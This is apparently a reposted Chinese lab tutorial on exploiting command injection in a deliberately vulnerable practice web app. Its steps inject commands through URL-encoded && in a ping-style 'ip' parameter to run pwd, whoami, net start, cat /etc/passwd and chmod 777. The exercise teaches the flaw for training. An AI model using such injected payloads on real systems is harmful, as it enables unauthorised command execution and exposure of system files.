命令執行漏洞靶場練習一


實驗目的

了解命令執行漏洞的危害

實驗原理

由於開發人員編寫源碼,沒有針對代碼中可執行的特殊函數入口做過濾,導致客戶端可以提交惡意構造語句提交,並交由服務器端執行。命令注入攻擊中WEB服務器沒有過濾類似system(),eval(),exec()等函數是該漏洞攻擊成功的最主要原因。

實驗內容

命令注入攻擊中WEB服務器沒有過濾類似system(),eval(),exec()等函數使得攻擊成功

實驗環境描述

1、靶機 用戶名密碼為:root toor

2、滲透機 用戶名密碼為:admin 123456

實驗步驟

1、在靶機上輸入ifconfig查看靶機地址(請自行修改ip地址,確保實驗可以做通)

圖片描述

2、在攻擊機win7的瀏覽器中輸入靶機地址192.168.10.117/index.php

圖片描述

3、找到 Commands injection ,點擊Example1進入命令注入環境第一的實例

圖片描述

4、在攻擊機瀏覽器中輸入http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 && pwd發現並沒有什么變化

圖片描述

5、http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 %26%26 pwd將&&進行編碼,顯示了當前路徑

圖片描述

漏洞利用

1、http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 %26%26 whoami進行whoami查詢

圖片描述

2、http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 %26%26 net start,通過命令注入攻擊查看web服務器開啟了哪些服務

圖片描述

3、http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 %26%26 cat /etc/passwd,顯示當前有哪些用戶。

圖片描述

4、http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 %26%26 ls -l查看當前目錄下所有可見文件的詳細屬性

圖片描述

5、http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 %26%26 chmod 777 examplel.php ,修改examplel.php文件的權限為文件所在的組和其他用戶是可讀可寫可執行。

圖片描述

6、http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 %26%26 ls -l查看當前目錄下所有可見文件的詳細屬性,examplel.php的文件權限已經被修改了。

圖片描述


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM